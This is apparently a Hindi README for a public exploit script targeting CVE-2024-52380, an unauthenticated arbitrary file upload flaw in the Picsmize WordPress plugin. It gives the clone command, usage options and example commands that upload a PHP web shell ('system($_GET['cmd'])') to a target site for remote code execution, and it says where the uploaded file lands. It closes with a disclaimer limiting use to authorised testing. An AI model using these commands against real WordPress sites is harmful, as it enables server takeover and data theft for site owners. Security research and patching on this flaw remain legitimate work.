
वर्डप्रेस के लिए Picsmize प्लगइन मनमानी फ़ाइल अपलोड के लिए असुरक्षित है।
WordPress के लिए Picsmize प्लगइन मनमानी फ़ाइल अपलोड के लिए कमजोर है।
यह स्क्रिप्ट WordPress के Picsmize प्लगइन में एक कमजोरी (CVE-2024-52380) का शोषण करती है, जिससे बिना प्रमाणीकरण वाले हमलावर मनमानी फ़ाइल अपलोड कर सकते हैं। यह कमजोरी Picsmize के सभी संस्करणों में 1.0.0 तक मौजूद है। इस कमजोरी का शोषण करने से लक्षित सर्वर पर रिमोट कोड निष्पादन हो सकता है।
requests लाइब्रेरी (pip install requests)git clone https://github.com/Nxploited/CVE-2024-52380-Exploit.git
cd CVE-2024-52380-Exploit
usage: CVE-2024-52380.py [-h] -u URL [-c CONTENT]
Check plugin version and upload a PHP file to a WordPress site.
options:
-h, --help show this help message and exit
-u URL, --url URL Base URL of the WordPress site (e.g., http://192.168.100.74:888).
-c CONTENT, --content CONTENT
Content of the PHP file to be uploaded.
python CVE-2024-52380.py -u http://192.168.1.100 -c "<?php system($_GET['cmd']); ?>"
स्क्रिप्ट उपयोग में आसानी के लिए दो कमांड-लाइन तर्क प्रदान करती है:
-u / --url (आवश्यक):
-u http://example.com
-c / --content (वैकल्पिक):
<?php phpinfo(); ?>
-c "<?php system($_GET['cmd']); ?>"
/wordpress: WordPress साइट की मूल निर्देशिका।wp-content/uploads: WordPress में मीडिया अपलोड के लिए डिफ़ॉल्ट निर्देशिका।2025/01: यह निर्देशिका संरचना सर्वर की दिनांक कॉन्फ़िगरेशन के आधार पर वर्ष (2025) और माह (जनवरी) से मेल खाती है।यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए है। इस उपकरण का अनधिकृत उपयोग उन सिस्टमों के विरुद्ध करना जिनके आप स्वामी नहीं हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति नहीं है, अवैध और अनैतिक है।